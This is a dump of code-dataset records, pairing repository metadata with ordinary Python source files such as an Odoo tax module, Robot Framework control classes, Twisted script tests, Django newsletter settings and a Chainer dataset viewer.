| Column | Type | Range / Values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3–288 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k – 681M, nullable (⌀) |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50, nullable (⌀) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19, nullable (⌀) |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | string | 142 classes |
| content | string | length 128 – 8.19k |
| authors | list | length 1 |
| author_id | string | length 1–132 |

f0de2600bd1e07a39f42bbe91fae645d210e66f7 | e489172f6e49e1239db56c047a78a29a6ffc0b36 | /via_account_taxform/account_tax.py | b1245ef236db95e377f0531f854b5c0588e892e0 | [] | no_license | eksotama/prln-via-custom-addons | f05d0059353ae1de89ccc8d1625a896c0215cfc7 | f2b44a8af0e7bee87d52d258fca012bf44ca876f | refs/heads/master | 2020-03-25T19:49:08.117628 | 2015-12-01T07:29:43 | 2015-12-01T07:29:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,478 | py |
# -*- encoding: utf-8 -*-
##############################################################################
#
# Vikasa Infinity Anugrah, PT
# Copyright (c) 2011 - 2013 Vikasa Infinity Anugrah <http://www.infi-nity.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
from osv import fields, osv
class account_tax(osv.osv):
_inherit = "account.tax"
def _get_tax_category(self, cr, uid, context=None):
res = self.pool.get('code.decode').get_company_selection_for_category(cr, uid, 'via_account_taxform', 'tax_category', context=context)
return res
_columns = {
'tax_category': fields.selection(_get_tax_category, 'Tax Category'),
}
account_tax()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| ["aero@aero.(none)"] | aero@aero.(none) |

a2514f32e71a028a6e1421e5456b756a92898f22 | ccfc0566cd646cbe1837affef08baec8cd245d3b | /src/robot/model/control.py | bafd41a03b8be08ca4906403ab2cae40e68f9a71 | ["Apache-2.0", "CC-BY-3.0"] | permissive | bmalhi/robotframework | 9f395d3197cdd7925b8def3aeb50b14fc31e83e2 | eaadffabc98b587c108cc904e0e54ce368020dd7 | refs/heads/master | 2023-03-01T14:30:23.110935 | 2021-02-05T16:01:30 | 2021-02-05T16:02:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,750 | py |
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robot.utils import setter, py3to2
from .body import Body, BodyItem
from .keyword import Keywords
@py3to2
@Body.register
class For(BodyItem):
type = BodyItem.FOR_TYPE
body_class = Body
repr_args = ('variables', 'flavor', 'values')
__slots__ = ['variables', 'flavor', 'values']
deprecate_keyword_attributes = True
def __init__(self, variables=(), flavor='IN', values=(), parent=None):
self.variables = variables
self.flavor = flavor
self.values = values
self.parent = parent
self.body = None
@setter
def body(self, body):
return self.body_class(self, body)
@property
def keywords(self):
"""Deprecated since Robot Framework 4.0. Use :attr:`body` instead."""
return Keywords(self, self.body)
@keywords.setter
def keywords(self, keywords):
Keywords.raise_deprecation_error()
@property
def source(self):
return self.parent.source if self.parent is not None else None
def visit(self, visitor):
visitor.visit_for(self)
def __str__(self):
variables = ' '.join(self.variables)
values = ' '.join(self.values)
return u'FOR %s %s %s' % (variables, self.flavor, values)
@py3to2
@Body.register
class If(BodyItem):
body_class = Body
repr_args = ('condition', 'type')
__slots__ = ['condition', 'type', '_orelse']
deprecate_keyword_attributes = True
def __init__(self, condition=None, type=BodyItem.IF_TYPE, parent=None):
self.condition = condition
self.type = type
self.parent = parent
self.body = None
self._orelse = None
@setter
def body(self, body):
return self.body_class(self, body)
@property # Cannot use @setter because it would create orelses recursively.
def orelse(self):
if self._orelse is None and self:
self._orelse = type(self)(type=None, parent=self)
return self._orelse
@orelse.setter
def orelse(self, orelse):
if orelse is None:
self._orelse = None
elif not isinstance(orelse, type(self)):
raise TypeError("Only %s objects accepted, got %s."
% (type(self).__name__, type(orelse).__name__))
else:
orelse.parent = self
self._orelse = orelse
@property
def source(self):
return self.parent.source if self.parent is not None else None
def config(self, **attributes):
BodyItem.config(self, **attributes)
if self.type is None:
self.type = self.ELSE_IF_TYPE if self.condition else self.ELSE_TYPE
return self
def visit(self, visitor):
if self:
visitor.visit_if(self)
def __str__(self):
if not self:
return u'None'
if not isinstance(self.parent, If):
return u'IF %s' % self.condition
if self.condition:
return u'ELSE IF %s' % self.condition
return u'ELSE'
def __bool__(self):
return self.type is not None
| ["peke@iki.fi"] | peke@iki.fi |

c253c273fb8c240f6eda595e492a460e88fd798c | ebdb33a86794a779714318f8a0b8397c3d6002b5 | /processing/state_processing_dataframe.py | 04a3eff325b03a22706837096af11c0d1c700efc | [] | no_license | ShabbirHasan1/interactive-corporate-report | b52c6c404a3b2f96f27b3770b7086a59400fb74a | ce0d81ab775ded84334ce599950dae9adaa978c5 | refs/heads/master | 2023-05-16T17:15:52.651033 | 2020-02-20T05:32:46 | 2020-02-20T05:32:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,326 | py |
import plotly.plotly as py
import pandas as pd
import numpy as np
import os
import _pickle as pickle
# rd = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/2011_us_ag_exports.csv')
my_path = os.path.abspath(os.path.dirname('__file__'))
path_in_file = os.path.join(my_path, "../data/google/addresses_google.csv")
df_own = pd.read_csv(path_in_file)
path_in_ngrams = os.path.join(my_path, "../data/cpickle/")
df_own = df_own[df_own["country"] == "United States"].reset_index(drop=True)
df_own = df_own.fillna(df_own.mean())
df_own = df_own.rename(columns={"city_long": "state", "city_short": "code", "Female": "Female Rating"
, "Male": "Male Rating", "Patrons": "Patrons Rating", 'Average Customer Network': 'Connectedness',
"Male": "Male Rating", "Patrons": "Patrons Rating",
'Food Aestheticist': 'Food Aestheticist Rating',
'High Network': 'High Network Rating', 'Low Network': 'Low Network Rating',
'Connoisseur': 'Connoisseur Rating'})
df_own.loc[:, ["Total Network", "Number of Reviewers"]] = df_own.loc[:,
["Total Network", "Number of Reviewers"]].applymap(np.int32)
df_own.loc[:, ['Male to Female', 'Foreign to Local',
'Male Rating', 'Female Rating', 'Local', 'Foreign',
'High Network Rating', 'Low Network Rating', 'Connoisseur Rating',
'Food Aestheticist Rating', 'Patrons Rating', 'First Visit',
'Visual Importance', 'Female Importance', 'Foreign Importance',
'Connectedness', 'Average Rating']] = df_own.loc[:, ['Male to Female', 'Foreign to Local',
'Male Rating', 'Female Rating', 'Local', 'Foreign',
'High Network Rating', 'Low Network Rating',
'Connoisseur Rating',
'Food Aestheticist Rating', 'Patrons Rating',
'First Visit',
'Visual Importance', 'Female Importance',
'Foreign Importance',
'Connectedness', 'Average Rating']].applymap(
np.float32).round(3)
df_own.replace({'county': {'Anchorage': 'Anchorage Borough', 'Fairbanks North Star': 'Fairbanks North Star Borough',
'Matanuska-Susitna': 'Matanuska-Susitna Borough'}})
df_own["county_state"] = df_own["county"] + ", " + df_own["code"]
us = df_own[df_own["country"] == "United States"].reset_index(drop=True)
sep = us[["Total Network", "Number of Reviewers", "code"]]
us = us.drop(["Total Network", "Number of Reviewers"], axis=1)
all_firms_mean = us.groupby("code").mean().reset_index()
all_firms_sum = sep.groupby("code").sum().reset_index()
all_firms = pd.concat((all_firms_mean, all_firms_sum), axis=1)
all_firms.drop(["Unnamed: 0"], axis=1, inplace=True)
all_firms = all_firms.iloc[:, 1:]
all_dicts = {}
for i in df_own["target_small_name"].unique():
firm_lvl = df_own[df_own["target_small_name"] == i].reset_index()
sep_fir = firm_lvl[["Total Network", "Number of Reviewers", "code"]]
firm_lvl = firm_lvl.drop(["Total Network", "Number of Reviewers"], axis=1)
firm_lvl = firm_lvl.groupby("code").mean().reset_index()
sep_fir = sep_fir.groupby("code").sum().reset_index()
firms = pd.concat((firm_lvl, sep_fir), axis=1)
firms.drop(["index", "Unnamed: 0"], axis=1, inplace=True)
firms = firms.iloc[:, 1:]
all_dicts[i] = firms
all_dicts["All"] = all_firms
pickle.dump(all_dicts, open(path_in_ngrams + "all_dicts_state.p", "wb"))
# go = input_fields["short_name"].tolist()
# go.append("All")
# [dict(args=['z', value["Female"] ], label=key, method='restyle') for key, value in all_dicts.items()]
# updatemenus=list([dict(buttons = [[dict(args=['z', value["Female"] ], label=key, method='update') for key, value in all_dicts.items()]])])
|
[
"islashires@gmail.com"
] |
islashires@gmail.com
|
062ad9dc571345a7f470daa1d624c95fab71381b
|
8f21513b8ba9e583246908006cac98e5e473e245
|
/2_date_time.py
|
4e845b6d46313ee7c1aa2f575d6f4ed98c8d58b0
|
[] |
no_license
|
MatsakB/Lesson3
|
6335bdeb86e3216e4576c170096d7bcf57ec4b2d
|
69493f147720ac7d975421d7400e6964ecfac3a2
|
refs/heads/master
| 2020-04-10T06:35:22.069664
| 2018-12-08T08:45:20
| 2018-12-08T08:45:20
| 160,859,025
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 556
|
py
|
from datetime import datetime, timedelta
date_today = datetime.now()
delta_days = timedelta(days=1)
delta_months = timedelta(days=30)
date_yesterday = date_today-delta_days
date_month_before = date_today-delta_months
print(date_today.strftime('%d.%m.%y'))
print(date_yesterday.strftime('%d.%m.%y'))
print(date_month_before.strftime('%d.%m.%y'))
# Convert the string "01/01/17 12:10:03.234567" into a datetime object
d = "01/01/17 12:10:03.234567"
d_datetime_object = datetime.strptime(d,'%d/%m/%y %H:%M:%S.%f')
print(d_datetime_object)
| ["you@example.com"] | you@example.com |

dc768c5a2982a554ecbde52148df68d05e357efd | b167407960a3b69b16752590def1a62b297a4b0c | /tools/project-creator/Python2.6.6/Lib/test/test_transformer.py | eb8ef8ab031ce6e160d63f4fdf244baf063d4060 | ["MIT"] | permissive | xcode1986/nineck.ca | 543d1be2066e88a7db3745b483f61daedf5f378a | 637dfec24407d220bb745beacebea4a375bfd78f | refs/heads/master | 2020-04-15T14:48:08.551821 | 2019-01-15T07:36:06 | 2019-01-15T07:36:06 | 164,768,581 | 1 | 1 | MIT | 2019-01-15T08:30:27 | 2019-01-09T02:09:21 | C++ | UTF-8 | Python | false | false | 1,146 | py |
import unittest
from test import test_support
# Silence Py3k warning
test_support.import_module('compiler', deprecated=True)
from compiler import transformer, ast
from compiler import compile
class Tests(unittest.TestCase):
def testMultipleLHS(self):
""" Test multiple targets on the left hand side. """
snippets = ['a, b = 1, 2',
'(a, b) = 1, 2',
'((a, b), c) = (1, 2), 3']
for s in snippets:
a = transformer.parse(s)
assert isinstance(a, ast.Module)
child1 = a.getChildNodes()[0]
assert isinstance(child1, ast.Stmt)
child2 = child1.getChildNodes()[0]
assert isinstance(child2, ast.Assign)
# This actually tests the compiler, but it's a way to assure the ast
# is correct
c = compile(s, '<string>', 'single')
vals = {}
exec c in vals
assert vals['a'] == 1
assert vals['b'] == 2
def test_main():
test_support.run_unittest(Tests)
if __name__ == "__main__":
test_main()
|
[
"278688386@qq.com"
] |
278688386@qq.com
|
f144fec17ff955f0806f4a5f976eb5a2072ff5dc
|
92ae735d5dc6f6a094daedbd32614e714d0b8c4a
|
/newsletter/settings.py
|
9ab91d32d35e7f7387b06c550e337e75ac0022a6
|
[
"MIT"
] |
permissive
|
Williano/Final-Senior-Year-Project-
|
3b01ac9fd85753720b01c2245cf9b71648aad35d
|
4bd988575537b37b5cf852b616d3db5666c95e7f
|
refs/heads/master
| 2023-08-07T16:11:42.778492
| 2023-06-05T04:59:06
| 2023-06-05T04:59:06
| 121,346,340
| 173
| 60
|
MIT
| 2023-06-05T04:59:07
| 2018-02-13T06:17:16
|
Python
|
UTF-8
|
Python
| false
| false
| 3,167
|
py
|
from importlib import import_module
from django.conf import settings as django_settings
from django.core.exceptions import ImproperlyConfigured
from .utils import Singleton
class Settings(object):
"""
A settings object that proxies settings and handles defaults, inspired
by `django-appconf` and the way it works in `django-rest-framework`.
By default, a single instance of this class is created as `<app>_settings`,
from which `<APP>_SETTING_NAME` can be accessed as `SETTING_NAME`, i.e.::
from myapp.settings import myapp_settings
if myapp_settings.SETTING_NAME:
# DO FUNKY DANCE
If a setting has not been explicitly defined in Django's settings, defaults
can be specified as `DEFAULT_SETTING_NAME` class variable or property.
"""
__metaclass__ = Singleton
def __init__(self):
"""
Assert app-specific prefix.
"""
assert hasattr(self, 'settings_prefix'), 'No prefix specified.'
def __getattr__(self, attr):
"""
Return Django setting `PREFIX_SETTING` if explicitly specified,
otherwise return `PREFIX_SETTING_DEFAULT` if specified.
"""
if attr.isupper():
# Require settings to have uppercase characters
try:
setting = getattr(
django_settings,
'%s_%s' % (self.settings_prefix, attr),
)
except AttributeError:
if not attr.startswith('DEFAULT_'):
setting = getattr(self, 'DEFAULT_%s' % attr)
else:
raise
return setting
else:
# Default behaviour
raise AttributeError(
'No setting or default available for \'%s\'' % attr
)
class NewsletterSettings(Settings):
""" Django-newsletter specific settings. """
settings_prefix = 'NEWSLETTER'
DEFAULT_CONFIRM_EMAIL = True
@property
def DEFAULT_CONFIRM_EMAIL_SUBSCRIBE(self):
return self.CONFIRM_EMAIL
@property
def DEFAULT_CONFIRM_EMAIL_UNSUBSCRIBE(self):
return self.CONFIRM_EMAIL
@property
def DEFAULT_CONFIRM_EMAIL_UPDATE(self):
return self.CONFIRM_EMAIL
@property
def RICHTEXT_WIDGET(self):
# Import and set the richtext field
NEWSLETTER_RICHTEXT_WIDGET = getattr(
django_settings, "NEWSLETTER_RICHTEXT_WIDGET", ""
)
if NEWSLETTER_RICHTEXT_WIDGET:
try:
module, attr = NEWSLETTER_RICHTEXT_WIDGET.rsplit(".", 1)
mod = import_module(module)
return getattr(mod, attr)
except Exception as e:
# Catch ImportError and other exceptions too
# (e.g. user sets setting to an integer)
raise ImproperlyConfigured(
"Error while importing setting "
"NEWSLETTER_RICHTEXT_WIDGET %r: %s" % (
NEWSLETTER_RICHTEXT_WIDGET, e
)
)
return None
newsletter_settings = NewsletterSettings()
|
[
"paawilly17@gmail.com"
] |
paawilly17@gmail.com
|
ff3771b5c0f1674a5c668a6a8e2b5f78017cab70
|
d83fde3c891f44014f5339572dc72ebf62c38663
|
/_bin/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/api_lib/auth/exceptions.py
|
b07bd1f9d71b922ba849cb4dc2a0eac9562fdd33
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
gyaresu/dotfiles
|
047cc3ca70f4b405ba272856c69ee491a79d2ebe
|
e5e533b3a081b42e9492b228f308f6833b670cfe
|
refs/heads/master
| 2022-11-24T01:12:49.435037
| 2022-11-01T16:58:13
| 2022-11-01T16:58:13
| 17,139,657
| 1
| 1
| null | 2020-07-25T14:11:43
| 2014-02-24T14:59:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,206
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""User errors raised by auth commands."""
from __future__ import absolute_import
from __future__ import unicode_literals
from googlecloudsdk.core import exceptions
class AuthenticationError(exceptions.Error):
"""Raised for errors reported by Oauth2client library."""
class InvalidCredentialsError(exceptions.Error):
"""Raised if credentials are not usable."""
class WrongAccountError(exceptions.Error):
"""Raised when credential account does not match expected account."""
class GitCredentialHelperError(exceptions.Error):
"""Raised for issues related to passing auth credentials to Git."""
|
[
"me@gareth.codes"
] |
me@gareth.codes
|
a2859f4ac719600fa16c18391c0265afda7857f5
|
238e46a903cf7fac4f83fa8681094bf3c417d22d
|
/VTK/vtk_7.1.1_x64_Release/lib/python2.7/site-packages/twisted/scripts/test/test_scripts.py
|
8705a90f7287a1f2a71871bea4ec36b22d67d56a
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
baojunli/FastCAE
|
da1277f90e584084d461590a3699b941d8c4030b
|
a3f99f6402da564df87fcef30674ce5f44379962
|
refs/heads/master
| 2023-02-25T20:25:31.815729
| 2021-02-01T03:17:33
| 2021-02-01T03:17:33
| 268,390,180
| 1
| 0
|
BSD-3-Clause
| 2020-06-01T00:39:31
| 2020-06-01T00:39:31
| null |
UTF-8
|
Python
| false
| false
| 6,855
|
py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for the command-line scripts in the top-level I{bin/} directory.
Tests for actual functionality belong elsewhere, written in a way that doesn't
involve launching child processes.
"""
from os import devnull, getcwd, chdir
from sys import executable
from subprocess import PIPE, Popen
from twisted.trial.unittest import SkipTest, TestCase
from twisted.python.modules import getModule
from twisted.python.filepath import FilePath
from twisted.python.test.test_shellcomp import ZshScriptTestMixin
def outputFromPythonScript(script, *args):
"""
Synchronously run a Python script, with the same Python interpreter that
ran the process calling this function, using L{Popen}, using the given
command-line arguments, with standard input and standard error both
redirected to L{os.devnull}, and return its output as a string.
@param script: The path to the script.
@type script: L{FilePath}
@param args: The command-line arguments to follow the script in its
invocation (the desired C{sys.argv[1:]}).
@type args: L{tuple} of L{str}
@return: the output passed to the proces's C{stdout}, without any messages
from C{stderr}.
@rtype: L{bytes}
"""
nullInput = file(devnull, "rb")
nullError = file(devnull, "wb")
stdout = Popen([executable, script.path] + list(args),
stdout=PIPE, stderr=nullError, stdin=nullInput).stdout.read()
nullInput.close()
nullError.close()
return stdout
class ScriptTestsMixin:
"""
Mixin for L{TestCase} subclasses which defines a helper function for testing
a Twisted-using script.
"""
bin = getModule("twisted").pathEntry.filePath.child("bin")
def scriptTest(self, name):
"""
Verify that the given script runs and uses the version of Twisted
currently being tested.
This only works when running tests against a vcs checkout of Twisted,
since it relies on the scripts being in the place they are kept in
version control, and exercises their logic for finding the right version
of Twisted to use in that situation.
@param name: A path fragment, relative to the I{bin} directory of a
Twisted source checkout, identifying a script to test.
@type name: C{str}
@raise SkipTest: if the script is not where it is expected to be.
"""
script = self.bin.preauthChild(name)
if not script.exists():
raise SkipTest(
"Script tests do not apply to installed configuration.")
from twisted.copyright import version
scriptVersion = outputFromPythonScript(script, '--version')
self.assertIn(str(version), scriptVersion)
class ScriptTests(TestCase, ScriptTestsMixin):
"""
Tests for the core scripts.
"""
def test_twistd(self):
self.scriptTest("twistd")
def test_twistdPathInsert(self):
"""
The twistd script adds the current working directory to sys.path so
that it's able to import modules from it.
"""
script = self.bin.child("twistd")
if not script.exists():
raise SkipTest(
"Script tests do not apply to installed configuration.")
cwd = getcwd()
self.addCleanup(chdir, cwd)
testDir = FilePath(self.mktemp())
testDir.makedirs()
chdir(testDir.path)
testDir.child("bar.tac").setContent(
"import sys\n"
"print sys.path\n")
output = outputFromPythonScript(script, '-ny', 'bar.tac')
self.assertIn(repr(testDir.path), output)
def test_manhole(self):
self.scriptTest("manhole")
def test_trial(self):
self.scriptTest("trial")
def test_trialPathInsert(self):
"""
The trial script adds the current working directory to sys.path so that
it's able to import modules from it.
"""
script = self.bin.child("trial")
if not script.exists():
raise SkipTest(
"Script tests do not apply to installed configuration.")
cwd = getcwd()
self.addCleanup(chdir, cwd)
testDir = FilePath(self.mktemp())
testDir.makedirs()
chdir(testDir.path)
testDir.child("foo.py").setContent("")
output = outputFromPythonScript(script, 'foo')
self.assertIn("PASSED", output)
def test_pyhtmlizer(self):
self.scriptTest("pyhtmlizer")
def test_tap2rpm(self):
self.scriptTest("tap2rpm")
def test_tap2deb(self):
self.scriptTest("tap2deb")
def test_tapconvert(self):
self.scriptTest("tapconvert")
def test_deprecatedTkunzip(self):
"""
The entire L{twisted.scripts.tkunzip} module, part of the old Windows
installer tool chain, is deprecated.
"""
from twisted.scripts import tkunzip
warnings = self.flushWarnings(
offendingFunctions=[self.test_deprecatedTkunzip])
self.assertEqual(DeprecationWarning, warnings[0]['category'])
self.assertEqual(
"twisted.scripts.tkunzip was deprecated in Twisted 11.1.0: "
"Seek unzipping software outside of Twisted.",
warnings[0]['message'])
self.assertEqual(1, len(warnings))
def test_deprecatedTapconvert(self):
"""
The entire L{twisted.scripts.tapconvert} module is deprecated.
"""
from twisted.scripts import tapconvert
warnings = self.flushWarnings(
offendingFunctions=[self.test_deprecatedTapconvert])
self.assertEqual(DeprecationWarning, warnings[0]['category'])
self.assertEqual(
"twisted.scripts.tapconvert was deprecated in Twisted 12.1.0: "
"tapconvert has been deprecated.",
warnings[0]['message'])
self.assertEqual(1, len(warnings))
class ZshIntegrationTestCase(TestCase, ZshScriptTestMixin):
"""
Test that zsh completion functions are generated without error
"""
generateFor = [('twistd', 'twisted.scripts.twistd.ServerOptions'),
('trial', 'twisted.scripts.trial.Options'),
('pyhtmlizer', 'twisted.scripts.htmlizer.Options'),
('tap2rpm', 'twisted.scripts.tap2rpm.MyOptions'),
('tap2deb', 'twisted.scripts.tap2deb.MyOptions'),
('tapconvert', 'twisted.scripts.tapconvert.ConvertOptions'),
('manhole', 'twisted.scripts.manhole.MyOptions')
]
|
[
"l”ibaojunqd@foxmail.com“"
] |
l”ibaojunqd@foxmail.com“
|
70bc331f3ab7dcdf0904d00a928becf959b12a5e
|
f3bd271bf00325881fb5b2533b9ef7f7448a75ec
|
/xcp2k/classes/_wf_correlation1.py
|
946851bae269b8bc3790a4acf9f9905235827943
|
[] |
no_license
|
obaica/xcp2k
|
7f99fc9d494859e16b9b0ea8e217b0493f4b2f59
|
6e15c2c95658f545102595dc1783f5e03a9e6916
|
refs/heads/master
| 2020-07-15T17:27:43.378835
| 2019-02-11T16:32:24
| 2019-02-11T16:32:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,305
|
py
|
from xcp2k.inputsection import InputSection
from _mp2_info1 import _mp2_info1
from _direct_canonical1 import _direct_canonical1
from _wfc_gpw1 import _wfc_gpw1
from _ri_mp21 import _ri_mp21
from _opt_ri_basis1 import _opt_ri_basis1
from _ri_rpa1 import _ri_rpa1
from _ri_laplace1 import _ri_laplace1
from _cphf1 import _cphf1
from _interaction_potential3 import _interaction_potential3
from _eri_mme2 import _eri_mme2
class _wf_correlation1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Method = None
self.Memory = None
self.Scale_s = None
self.Scale_t = None
self.Group_size = None
self.Row_block = None
self.Col_block = None
self.Calc_cond_num = None
self.Ri_metric = None
self.Eri_method = None
self.Eri_blksize = None
self.Minimal_gap = None
self.MP2_INFO = _mp2_info1()
self.DIRECT_CANONICAL = _direct_canonical1()
self.WFC_GPW = _wfc_gpw1()
self.RI_MP2 = _ri_mp21()
self.OPT_RI_BASIS = _opt_ri_basis1()
self.RI_RPA = _ri_rpa1()
self.RI_LAPLACE = _ri_laplace1()
self.CPHF = _cphf1()
self.INTERACTION_POTENTIAL = _interaction_potential3()
self.ERI_MME = _eri_mme2()
self._name = "WF_CORRELATION"
self._keywords = {'Minimal_gap': 'MINIMAL_GAP', 'Group_size': 'GROUP_SIZE', 'Row_block': 'ROW_BLOCK', 'Calc_cond_num': 'CALC_COND_NUM', 'Scale_s': 'SCALE_S', 'Scale_t': 'SCALE_T', 'Memory': 'MEMORY', 'Eri_method': 'ERI_METHOD', 'Col_block': 'COL_BLOCK', 'Method': 'METHOD', 'Eri_blksize': 'ERI_BLKSIZE', 'Ri_metric': 'RI_METRIC'}
self._subsections = {'MP2_INFO': 'MP2_INFO', 'RI_RPA': 'RI_RPA', 'WFC_GPW': 'WFC_GPW', 'RI_LAPLACE': 'RI_LAPLACE', 'RI_MP2': 'RI_MP2', 'CPHF': 'CPHF', 'INTERACTION_POTENTIAL': 'INTERACTION_POTENTIAL', 'OPT_RI_BASIS': 'OPT_RI_BASIS', 'ERI_MME': 'ERI_MME', 'DIRECT_CANONICAL': 'DIRECT_CANONICAL'}
self._aliases = {'Row_block_size': 'Row_block', 'Number_proc': 'Group_size', 'Col_block_size': 'Col_block', 'Calc_condition_number': 'Calc_cond_num', 'Ri': 'Ri_metric'}
@property
def Number_proc(self):
"""
See documentation for Group_size
"""
return self.Group_size
@property
def Row_block_size(self):
"""
See documentation for Row_block
"""
return self.Row_block
@property
def Col_block_size(self):
"""
See documentation for Col_block
"""
return self.Col_block
@property
def Calc_condition_number(self):
"""
See documentation for Calc_cond_num
"""
return self.Calc_cond_num
@property
def Ri(self):
"""
See documentation for Ri_metric
"""
return self.Ri_metric
@Number_proc.setter
def Number_proc(self, value):
self.Group_size = value
@Row_block_size.setter
def Row_block_size(self, value):
self.Row_block = value
@Col_block_size.setter
def Col_block_size(self, value):
self.Col_block = value
@Calc_condition_number.setter
def Calc_condition_number(self, value):
self.Calc_cond_num = value
@Ri.setter
def Ri(self, value):
self.Ri_metric = value
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
7588e0b50d82ff81490c180db39e55febd0d85ab
|
f8bdc46409c9f5eaf3d85ef157260589462d941a
|
/demos/instance_occlsegm/examples/synthetic2d/legacy/view_arc2017_occlusion.py
|
408b6b042140818b8b6f50d4e6382df6fedf1f5c
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
start-jsk/jsk_apc
|
2e268f8b65e9d7f4f9cc4416dc8383fd0a7b9750
|
c4e349f45ef38457dc774e33f6902acf1a1540a6
|
refs/heads/master
| 2023-09-05T09:06:24.855510
| 2023-09-01T17:10:12
| 2023-09-01T17:10:12
| 25,620,908
| 36
| 25
|
NOASSERTION
| 2023-09-01T17:10:14
| 2014-10-23T05:28:31
|
Common Lisp
|
UTF-8
|
Python
| false
| false
| 1,604
|
py
|
#!/usr/bin/env python
import chainer_mask_rcnn
import instance_occlsegm_lib
import contrib
if __name__ == '__main__':
dataset = contrib.datasets.ARC2017OcclusionDataset(
split='train', do_aug=True)
def visualize_func(dataset, index):
img, bboxes, labels, lbls = dataset[index]
class_names = dataset.class_names
captions = [class_names[l] for l in labels]
vizs = []
for bbox, label, lbl, caption in \
zip(bboxes, labels, lbls, captions):
mask_bg = lbl == 0
mask_visible = lbl == 1
mask_invisible = lbl == 2
viz = chainer_mask_rcnn.utils.draw_instance_bboxes(
img, [bbox], [label], n_class=len(class_names),
masks=[mask_bg], captions=[caption])
vizs.append(viz)
viz = chainer_mask_rcnn.utils.draw_instance_bboxes(
img, [bbox], [label], n_class=len(class_names),
masks=[mask_visible], captions=[caption])
vizs.append(viz)
viz = chainer_mask_rcnn.utils.draw_instance_bboxes(
img, [bbox], [label], n_class=len(class_names),
masks=[mask_invisible], captions=[caption])
vizs.append(viz)
viz = instance_occlsegm_lib.image.tile(
vizs, (max(1, len(vizs) // 3), 3))
return viz
instance_occlsegm_lib.datasets.view_dataset(dataset, visualize_func)
# viz = instance_occlsegm_lib.image.resize(viz, size=1000 * 1000)
# instance_occlsegm_lib.io.imshow(viz)
# instance_occlsegm_lib.io.waitkey()
|
[
"www.kentaro.wada@gmail.com"
] |
www.kentaro.wada@gmail.com
|
3e7af994a6235be22aa1a34320c806ffcc69e7cd
|
0ca1d8363439e0e34d7eaa54f021ff0b2940cac7
|
/facturacion/migrations/0016_auto_20181130_1741.py
|
8521ce266772004f3ca7a4e556672f389672ca4b
|
[] |
no_license
|
geovanniberdugo/medhis
|
d6b606ef2c391738ee5fa4209712b6c0eb01ae40
|
b8f8df111432bfab537853ed8e8dbd4603e9707d
|
refs/heads/main
| 2023-02-13T19:44:33.699689
| 2021-01-15T22:08:35
| 2021-01-15T22:08:35
| 330,032,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 520
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-11-30 22:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('facturacion', '0015_auto_20181120_1824'),
]
operations = [
migrations.AlterField(
model_name='caja',
name='verificacion_correcta',
field=models.BooleanField(default=True, help_text='Indica si los valores son correctos'),
),
]
|
[
"geovanni.berdugo@gmail.com"
] |
geovanni.berdugo@gmail.com
|
00f502880899ebc4ff3c56f1b131f1ba2ae7846c
|
